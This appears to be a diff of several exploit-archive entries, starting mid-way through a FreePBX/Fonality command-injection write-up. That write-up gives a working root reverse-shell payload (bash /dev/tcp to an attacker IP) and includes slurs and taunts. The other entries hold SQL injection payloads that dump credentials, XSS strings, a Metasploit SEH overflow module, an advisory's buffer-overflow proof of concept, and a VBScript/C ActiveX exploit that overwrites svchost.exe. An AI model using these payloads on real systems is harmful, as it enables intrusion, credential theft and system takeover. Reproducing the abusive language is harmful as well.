request ID we Edit otherwise add a new phone
$freepbx_device_list = GetFreepbxDeviceList();
$smarty->assign("mac_address", $mac_address);
$smarty->assign("phone", $phoneinfo);
$smarty->assign("freepbx_device_list", $freepbx_device_list);
$smarty->assign("message", $message);
$template = "endpoint_".$PhoneType."_edit.tpl";
break;
case 'Delete':
exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
getSQL("DELETE FROM ".$PhoneType." WHERE
mac_address='".$_REQUEST['mac']."'",'endpoints');
$smarty->assign("phones", ListPhones($PhoneType));
$template = "endpoint_".$PhoneType."_list.tpl";
break;
it's obvious we care about this line
>>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
Exploitation demo :
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo
id>xx;faris
result will be written to xx
but this is not the full movie yet ,
Am here to give fonality an night mare , which take the form of "root"
privzz
actually the server is configured by default to allow the web interface
pages to edit many files @ the root directory
so any noob can easily execute the "sudo fuck" with out being permited for
password , and the result is > root
Demo
<Back connection with root privs>
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo
bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
change to your ip and the port you are listening to
and , Volia , you are root
now am sure you're happy as pig in shit xD
Still need more??
you will notice that you're unable to reach this file due to the http
firewall
but actually there is simple and yet dirty trick that allow you to get pass
through it , and execute your command smooooothely as boat on the river ;)
And here come the challenge , let's see what the faggots can do with this ;)
need hint???
use your mind and fuck off :/
Big greets fly to the all sec4ever family
oh , and for voip lames , you can use our 0Days for sure
but once it become 720Days xD
Regards,
Faris <the Awsome>

27
platforms/php/webapps/32330.txt Executable file
View file

@ -0,0 +1,27 @@
Open Support Blind SQL Injection v2.0 Vulnerability
===================================================
Author indoushka
=================
vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar
=================
# Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved
This vulnerability affects /support/login.php
emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login
This vulnerability affects /support/responder.php.
idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
This vulnerability affects /support/verarticulo.php.
/support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

30
platforms/php/webapps/32331.txt Executable file
View file

@ -0,0 +1,30 @@
###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability
[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor : 12 March 2014
[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code:
113 $jal_lastID = JRequest::getVar( 'jal_lastID', 0 );
114
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
[-] Exploit:
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st
###################################################################################

9
platforms/php/webapps/32334.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31010/info
Celerondude Uploader is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Celerondude Uploader 6.1 is vulnerable; other versions may also be affected.
In the login page , username field enter : "><script>alert(1);</script>"

9
platforms/php/webapps/32337.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31055/info
Silentum LoginSys is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Silentum LoginSys 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?message=[XSS]

7
platforms/php/webapps/32338.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31057/info
phpAdultSite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
index.php?&results_per_page=50"><script type="text/javascript">alert(/XSS vuln by DavidSopas.com/)</script>

12
platforms/php/webapps/32340.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31060/info
Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Gallery 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/search.php?title=[XSS]
http://www.example.com/path/search.php?description=[XSS]
http://www.example.com/path/search.php?author=[XSS]
http://www.example.com/path/login.php?return=[XSS]

10
platforms/php/webapps/32342.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31063/info
eXtrovert software Thyme is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Thyme 1.3 is affected; other versions may also be vulnerable.
Submit the following to the input field at /thyme/modules/groups/pick_users.php:
' union all select proof,of,concept from mysql.db/*

74
platforms/windows/dos/32329.rb Executable file
View file

@ -0,0 +1,74 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Gold MP4 Player 3.3 Universal SEH Exploit',
'Description' => %q{
This module exploits a buffer overflow in Gold MP4 Player 3.3.
When this application is loaded a special crafted Flash URL via File -> Open Flash URL. Buffer overflow happens and it allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Revin Hadi S', #Exploit & MSF Module
'Gabor Seljan' #Vulnerability POC
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/31914/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x100F041C, 'Offset' => 253 } ], #/p/p/r SkinPlusPlus.dll
],
'Privileged' => false,
'DisclosureDate' => 'Date',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name contains malicious Flash URL.', 'evil.txt']),
], self.class)
end
def exploit
http = "http://"
junk = "\x41" * (target['Offset'])
nseh = "\xEB\x06\x90\x90"
format = ".swf"
sploit = http + junk + nseh + [target['Ret']].pack('V') + make_nops(16) + payload.encoded + format
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

152
platforms/windows/dos/32332.txt Executable file
View file

@ -0,0 +1,152 @@
RCE Security Advisory
http://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Free Download Manager
Vendor URL: www.freedownloadmanager.org
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2014-02-20
Date published: 2014-02-13
CVSSv2 Score: 9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE: CVE-2014-2087
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
Free Download Manager v3.9.3 build 1360 (latest)
Free Download Manager v3.8 build 1173
Free Download Manager v3.0 build 852
and other older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in the
Free Download Manager.
The application parses download requests, which are added to the
download queue, but does not properly validate the length of the
complete download queue object when its removed from the queue by the
user. The following function from fdm.exe (source file:
Downloads_Deleted.cpp) is triggered on deletion:
void CDownloads_Deleted::UpdateDownload(int iItem)
This function reads the filename of the download object using
CDownloads_Tasks::GetFileName into szFile and adds the whole URL value
as a description (in brackets) via an insecure strcat() sequence to
szFile during the queue deletion process.
Since the application follows HTTP 301 redirects, an attacker who
controls the target HTTP server is able to send arbitrary long filename
values to exploit this flaw. If the complete name of the queued download
exceeds the size of szFile (10000 bytes), strcat() writes outside the
expected memory boundaries.
This leads to a stack-based buffer overflow with an overwritten SEH
chain or return points, resulting in remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result in a denial-of-service condition.
This vulnerability is also exploitable locally via "File->Import->Import
list of downloads"
5. VULNERABLE CODE PART
-----------------------
// Downloads_Deleted.cpp
void CDownloads_Deleted::UpdateDownload(int iItem)
{
vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
CHAR szFile [10000];
CDownloads_Tasks::GetFileName (dld, szFile);
lstrcat (szFile, " (");
lstrcat (szFile, dld->pMgr->get_URL ());
lstrcat (szFile, ")");
SetItemText (iItem, 0, szFile);
[..]
}
6. PROOF-OF-CONCEPT (PYTHON)
----------------------------
#!/usr/bin/python
from socket import *
from time import sleep
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
junk0 = "\x43" * 9000
payload = junk0
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a
href=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
7. SOLUTION
-----------
None
8. REPORT TIMELINE
------------------
2014-02-20: Discovery of the vulnerability
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
2014-02-24: MITRE assigns CVE-2014-2087
2014-02-25: Vendor Notification #2
2014-02-26: Vendor Notification #3
2014-03-05: Vendor Response
2014-03-05: Vulnerability details sent to vendor
2014-03-09: RCE Security asks for a status update
2014-03-13: No response from vendor
2014-03-13: Full Disclosure according to disclosure policy
9. REFERENCES
-------------
http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution

18
platforms/windows/remote/32344.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://victim.com/svchost.exe"
test.Open remURL, True
test.Save "C:\WINDOWS\system32\svchost.exe", True
End Sub
</script>

100
platforms/windows/remote/32345.cpp Executable file
View file

@ -0,0 +1,100 @@
source: http://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
/*Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite
Credits for finding the bug go to S4rK3VT TEAM,nice work Ciph3r :) .
Credits for exploit go to fl0 fl0w
References- http://www.securityfocus.com/bid/31069/info
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>
char file_1[]=
"\x3C\x6F\x62\x6A\x65\x63\x74\x20\x63\x6C"
"\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73"
"\x69\x64\x3A\x41\x31\x45\x37\x35\x33\x35"
"\x37\x2D\x38\x38\x31\x41\x2D\x34\x31\x39"
"\x45\x2D\x38\x33\x45\x32\x2D\x42\x42\x31"
"\x36\x44\x42\x31\x39\x37\x43\x36\x38\x22"
"\x20\x69\x64\x3D\x27\x74\x65\x73\x74\x27"
"\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E"
"\x0D\x0A\x0D\x0A\x3C\x69\x6E\x70\x75\x74"
"\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D"
"\x56\x42\x53\x63\x72\x69\x70\x74\x20\x6F"
"\x6E\x63\x6C\x69\x63\x6B\x3D\x74\x72\x79"
"\x4D\x65\x28\x29\x20\x74\x79\x70\x65\x3D"
"\x62\x75\x74\x74\x6F\x6E\x20\x76\x61\x6C"
"\x75\x65\x3D\x27\x43\x6C\x69\x63\x6B\x20"
"\x68\x65\x72\x65\x20\x74\x6F\x20\x73\x74"
"\x61\x72\x74\x20\x74\x68\x65\x20\x74\x65"
"\x73\x74\x27\x3E\x0D\x0A\x0D\x0A\x3C\x73"
"\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67"
"\x75\x61\x67\x65\x3D\x27";
char file_2[]=
"\x76\x62\x73\x63\x72\x69\x70\x74\x27\x3E\x0D\x0A\x20\x20\x53"
"\x75\x62\x20\x74\x72\x79\x4D\x65\x0D\x0A\x20\x20\x20\x64\x69"
"\x6D\x20\x72\x65\x6D\x55\x52\x4C\x0D\x0A\x20\x20\x20\x72\x65"
"\x6D\x55\x52\x4C\x20\x3D\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F"
"\x76\x69\x63\x74\x69\x6D\x2E\x63\x6F\x6D\x2F\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x0D\x0A\x20\x20\x20\x74\x65"
"\x73\x74\x2E\x4F\x70\x65\x6E\x20\x72\x65\x6D\x55\x52\x4C\x2C"
"\x20\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x74\x65\x73\x74\x2E"
"\x53\x61\x76\x65\x20\x22\x43\x3A\x5C\x57\x49\x4E\x44\x4F\x57"
"\x53\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x2C\x20\x54\x72\x75\x65\x0D"
"\x0A\x20";
char file_3[]=
"\x45\x6E\x64\x20\x53\x75\x62\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E";
void usage(char *);
int main(int argc,char *argv[])
{ FILE *m;
unsigned int offset=0;
if(argc<2)
{ usage(argv[0]); }
if((m=fopen(argv[1],"wb"))==NULL)
{ printf("error");
exit(0);
}
char *buffer;
buffer=(char *)malloc(strlen(file_1)+strlen(file_2)+strlen(file_3));
memcpy(buffer,file_1,strlen(file_1)); offset=strlen(file_1);
memcpy(buffer+offset,file_2,strlen(file_2)); offset+=strlen(file_2);
memcpy(buffer+offset,file_3,strlen(file_3));
fprintf(m,"%s",buffer);
system("cls");
printf("|****************************************************||\n");
printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n");
printf("File successfully built\n");
system("color 02");
Sleep(2000);
printf("|****************************************************||\n");
free(buffer);
fclose(m);
return 0;
}
void usage(char *f)
{ printf("|****************************************************||\n");
printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n\n");
printf("Usage: exploit.exe file.html\n\n");
printf("Credits for finding the bug go to S4rK3VT TEAM\n");
printf("Credits for exploit go to fl0 fl0w\n");
printf("|****************************************************|\n");
system("color 03");
Sleep(2000);
}